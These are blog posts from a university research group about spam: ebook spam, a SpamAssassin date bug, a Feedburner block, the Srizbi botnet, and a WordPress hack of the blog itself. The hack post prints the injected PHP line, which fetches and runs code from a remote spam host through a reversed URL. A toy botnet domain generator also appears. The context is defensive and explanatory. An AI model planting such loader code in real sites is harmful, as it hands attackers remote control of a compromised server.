UMBC ebiquity

New frontiers in spam: the Kindle Swindle

April 6th, 2011, by Tim Finin, posted in Machine Learning

Publishing Trends has a good post describing a new variation on spam: creating low-quality ebooks from plagiarized or public-domain content and selling them in ebook markets like Amazon’s Kindle store. If you want to MAKE.MONEY.FAST, there are people willing to help.

Automatically detecting these spam ebooks might make a good machine learning project. One obstacle is that using features of the ebook itself (e.g., poor formatting) might require purchasing it. But the store listing itself is sure to expose many useful features that could support an effective classifier.
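As a sketch of what such a classifier might look like (everything here is illustrative: the metadata fields, the publisher whitelist, and the features are my assumptions, not actual Kindle store data), a standard logistic regression over store-level listing features would be a natural starting point:

# Illustrative sketch: classify ebook listings as spam using only
# metadata the store already displays, so nothing has to be purchased.
# All field names below are hypothetical, not real Kindle store fields.
from sklearn.feature_extraction import DictVectorizer
from sklearn.linear_model import LogisticRegression

KNOWN_PUBLISHERS = {"Penguin", "Random House"}  # illustrative whitelist

def listing_features(listing):
    """Features visible on the listing page, no purchase required."""
    return {
        "price": listing["price"],                 # spam ebooks cluster at low price points
        "title_length": len(listing["title"]),
        "known_publisher": int(listing["publisher"] in KNOWN_PUBLISHERS),
        "titles_by_author": listing["titles_by_author"],  # implausibly prolific "authors"
        "review_count": listing["review_count"],
    }

def train(labeled_listings):
    """labeled_listings: iterable of (listing_dict, is_spam) pairs."""
    vec = DictVectorizer()
    X = vec.fit_transform(listing_features(l) for l, _ in labeled_listings)
    y = [spam for _, spam in labeled_listings]
    return vec, LogisticRegression(max_iter=1000).fit(X, y)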

(h/t Bruce Schneier)

Spamassassin 2010 bug

January 1st, 2010, by Tim Finin, posted in GENERAL

Shades of Y2K! Mike Cardwell reports on a rule in Spamassassin that judges any message sent in or after 2010 as “grossly in the future” and treats this as evidence of it being spam. I just checked and found that our mail server’s Spamassassin is using this buggy FH_DATE_PAST_20XX rule.

If you are using Spamassassin, or think your mail server might be, check the source of mail you have received today. Here’s an example from one of my messages this morning.

X-Spam-Checker-Version: SpamAssassin 3.2.5 ... on mail.cs.umbc.edu
X-Spam-Level: *
X-Spam-Status: No, score=1.6 required=5.0 tests=AWL,FH_DATE_PAST_20XX
  autolearn=disabled version=3.2.5
Received: from mail-yw0-f142.google.com (mail-yw0-f142.google.com
  [209.85.211.142]) by mail.cs.umbc.edu (8.14.3/8.14.3) with ESMTP
  id o01DjJUn011187; Fri, 1 Jan 2010 08:45:19 -0500 (EST)
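If you’d rather not eyeball raw headers, a few lines of Python can scan a local mailbox for hits. This is just a sketch; the mbox path is a stand-in for wherever your system keeps your mail.

import mailbox

# Scan an mbox file for messages flagged by the buggy rule.
# "/var/mail/yourname" is a placeholder path; adjust for your setup.
for msg in mailbox.mbox("/var/mail/yourname"):
    status = msg.get("X-Spam-Status", "")
    if "FH_DATE_PAST_20XX" in status:
        print(msg.get("Subject", "(no subject)"), "->", status)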

If the message exceeds the local spam score threshold, you may find a block with more details in your message header, like this example.

Content analysis details:   (6.1 points, 5.0 required)

 pts rule name              description
---- ---------------------- ----------------------------------
 3.4 FH_DATE_PAST_20XX      The date is grossly in the future.
-4.0 RCVD_IN_DNSWL_MED      RBL: Sender listed at http://www.dnswl.org/,
                            medium trust [130.85.25.80 listed in list.dnswl.org]
 1.8 SUBJ_ALL_CAPS          Subject is all capitals
 0.7 MSOE_MID_WRONG_CASE    MSOE_MID_WRONG_CASE
 4.2 FORGED_MUA_OUTLOOK     Forged mail pretending to be from MS Outlook

As a workaround until your server updates Spamassassin, you can lower the points the rule adds to a message’s spam score to 0.0 in Spamassassin’s configuration file (local.cf) or in your own user-prefs file.

score FH_DATE_PAST_20XX 0.0

Ebiquity Google alert tripwires triggered

May 21st, 2009, by Tim Finin, posted in Ebiquity, Google, Security, splog

Yesterday we discovered that our ebiquity blog had been hacked. It looks like a vulnerability in our old WordPress installation was exploited to add the following code to the top of our blog’s main page.

<?php $site = create_function('','$cachedir="/tmp/"; $param="qq"; $key=$_GET[$param]; $rand="1239aef"; $said=23; $type=1; $stprot="http://blogwp.info"; '.file_get_contents(strrev("txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"))); $site(); ?>

This code caused URLs like http://ebiquity.umbc.edu/?qq=1671 to redirect to a spam page. We’ve upgraded the blog to the latest WordPress release, which hopefully will prevent this exploit from being used again. (Notice the reversed URL — LOL!)
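The obfuscation is shallow: the injected code hides the URL of the remote payload by storing it reversed and calling strrev() at run time. Undoing it takes one line (shown here in Python rather than PHP):

# Reverse the string the malware feeds to strrev() to recover the payload URL.
print("txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"[::-1])
# prints: http://blogwp.info/detailed/example/pharm.txt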

We discovered the problem through a clever trick I read about last year on a site I’ve since forgotten (maybe here). We created several Google Alerts triggered by the appearance of spam-related words on pages apparently hosted by ebiquity.umbc.edu. For example:

  • adult OR girls OR sex OR sexx OR XXX OR porn OR pornography site:ebiquity.umbc.edu
  • viagra OR cialis OR levitra OR Phentermine OR Xanax site:ebiquity.umbc.edu

I would get several false positives a month from these alerts triggered by non-spam entries on our site. In fact, *this* post will generate a false positive. But yesterday I got a true positive. Looking at the log files, I think I got the alert within a few hours of when our blog was hacked. So I am happy to say that this worked and worked well. Without this alert, it might have taken weeks to notice the problem.
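The same tripwire can also be run locally, say from a cron job. Here is a minimal sketch (the page list and keyword list are illustrative) that fetches your own pages and flags any that suddenly contain spam vocabulary:

from urllib.request import urlopen

PAGES = ["http://ebiquity.umbc.edu/"]  # pages to watch; extend as needed
KEYWORDS = ["viagra", "cialis", "levitra", "phentermine", "xanax"]

for url in PAGES:
    html = urlopen(url).read().decode("utf-8", errors="replace").lower()
    hits = [word for word in KEYWORDS if word in html]
    if hits:
        print("possible compromise on", url, ":", hits)

Google Alerts still has the edge that it watches pages you don’t know about, including ones a spammer creates, but a local check like this catches a defacement of the pages you care most about without waiting for a crawl.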


[Figure: Google alert for a hacked website]

The results of this Google search reveal many compromised blogs from the .edu domain.

Storms on Planet Social Media Research

May 7th, 2009, by Tim Finin, posted in Google, Social media, splog

We maintain Planet Social Media Research (SMR) as a feed aggregator for a set of blogs relevant to research in social media systems. A few days ago I noticed that it wasn’t including new posts from some of the blogs. After updating the Planet Venus software we use and poking around, I discovered that our server is unable to access any feeds that resolve to Feedburner.
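The check itself is easy to reproduce. A sketch (the feed URL is a stand-in for the entries in our Planet configuration):

from urllib.request import urlopen

FEEDS = ["http://feeds.feedburner.com/SomeBlog"]  # hypothetical feed URL

# Fetch each feed from this host and report which ones fail.
for url in FEEDS:
    try:
        print(url, "->", urlopen(url, timeout=10).getcode())
    except Exception as e:
        print(url, "-> FAILED:", e)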

Apparently Feedburner has a blacklist of IP addresses that it blocks, and our server must now be on it. We have a request in to straighten this out and hope that everything will be back to normal very soon. (I was able to get our own blog back onto Planet SMR by reconfiguring the system to revert to the old, non-Feedburner feed.)

We’ve not yet heard from Feedburner/Google and don’t know why we are on their blacklist. It’s unlikely to be a result of our accessing feeds too frequently: we rebuild the site and aggregated feed once an hour, and only about ten of our feeds resolve to Feedburner.

My speculation is that this is collateral damage in the global war on spam. The easiest way for splogs (spam blogs) to get content is to hijack feeds from other blogs. Web spammers can do even better at disguising their splogs as legitimate sites if they aggregate several feeds that are topically related.

One way to fight such splogs is to deny them access to the feeds. So Google could be trying to protect Feedburner users, and to be a good steward of the Web environment, by blocking suspected web spammers from the feeds hosted by Feedburner.

So, my guess is that Google thinks the Planet SMR site is a splog. We are not, of course. We only include the feeds of blogs that want to be on SMR. We also do not host any ads, which are the motivation for most splogs.

If our speculation is right, and Google is blocking our access because it thinks we are a splog site, then many other legitimate feed-aggregator sites have this problem or soon will.

By the way — we are always interested in suggestions for new blogs to add to Planet SMR. If you have or know of one, contact us at planet-smr at cs.umbc.edu.

update 5/8: We’ve identified and solved the problem, thanks to Google Freebase ‘community expert’ Franklin Tse. The problem was due to an old entry for the Freebase IP address in the server’s /etc/hosts table. I think we added it when we were having some technical difficulties some years ago and wanted to keep our key services running smoothly. I guess the trouble with quick temporary hacks is that they’re easy to forget and come back to bite you.
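For anyone worried about similar forgotten overrides, here is a sketch of a sanity check: compare each /etc/hosts mapping against a direct DNS lookup. (It uses the dnspython package precisely because dnspython bypasses /etc/hosts; the standard-library resolver would consult the hosts file first and just hand back the stale entry.)

import dns.resolver  # pip install dnspython

with open("/etc/hosts") as hosts:
    for line in hosts:
        line = line.split("#")[0].strip()  # drop comments and blank lines
        if not line:
            continue
        ip, *names = line.split()
        for name in names:
            if name == "localhost" or "." not in name:
                continue  # skip local-only names
            try:
                dns_ips = {r.address for r in dns.resolver.resolve(name, "A")}
            except Exception:
                continue  # no A record; nothing to compare against
            if ip not in dns_ips:
                print("stale?", name, "hosts says", ip, "DNS says", dns_ips)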

How the Srizbi botnet escaped destruction to spam again

November 30th, 2008, by Tim Finin, posted in Security

Just like Freddy Krueger, botnets are hard to kill.

In a series of posts on his Security Fix blog, Brian Krebs provides a good explanation of how the Srizbi botnet was able to come back to life after being killed (we thought!) earlier this month.

“The botnet Srizbi was knocked offline Nov. 11 along with Web-hosting firm McColo, which Internet security experts say hosted machines that controlled the flow of 75 percent of the world’s spam. One security firm, FireEye, thought it had found a way to prevent the botnet from coming back online by registering domain names it thought Srizbi was likely to target. But when that approach became too costly for the firm, they had to abandon their efforts.”

In an example of good distributed programming design, the botnet had a backup plan in case its control servers were taken down.

“The malware contained a mathematical algorithm that generates a random but unique Web site domain name that the bots would be instructed to check for new instructions and software updates from its authors. Shortly after McColo was taken offline, researchers at FireEye said they deciphered the instructions that told computers infected with Srizbi which domains to seek out. FireEye researchers thought this presented a unique opportunity: If they could figure out what those rescue domains would be going forward, anyone could register or otherwise set aside those domains to prevent the Srizbi authors from regaining control over their massive herd of infected machines.”
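To make the mechanism concrete, here is a toy illustration of the rendezvous idea. This is not Srizbi’s actual algorithm (FireEye reverse-engineered it but never published it in full); the point is only that when the domain list is a deterministic function of the date, the bots, the botmaster, and anyone else who knows the algorithm can all compute the same list in advance:

import hashlib
from datetime import date

def rendezvous_domains(day, count=4):
    """Toy date-seeded domain generator; NOT Srizbi's real algorithm."""
    domains = []
    for i in range(count):
        digest = hashlib.md5(f"{day.isoformat()}-{i}".encode()).hexdigest()
        # map hex digits onto letters to get plausible-looking labels
        label = "".join(chr(ord("a") + int(c, 16) % 26) for c in digest[:10])
        domains.append(label + ".com")
    return domains

print(rendezvous_domains(date(2008, 11, 30)))

That determinism is exactly what FireEye exploited: compute tomorrow’s domains today and register them before the botmaster does.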

Unfortunately, FireEye did not have the resources to carry out its plan and was forced to abandon it, but not before seeking help from other companies and organizations with deeper pockets.

“A week ago, FireEye researcher Lanstein said they were looking for someone else to register the domain names that the Srizbi bots might try to contact to revive themselves. He said they approached other companies such as VeriSign Inc. and Microsoft Corp. After FireEye abandoned its efforts, some other members of the computer security community said they reached out for help from the United States Computer Emergency Readiness Team, or US-CERT, a partnership between the Department of Homeland Security and the private sector to combat cybersecurity threats.”

File this one under opportunity, lost.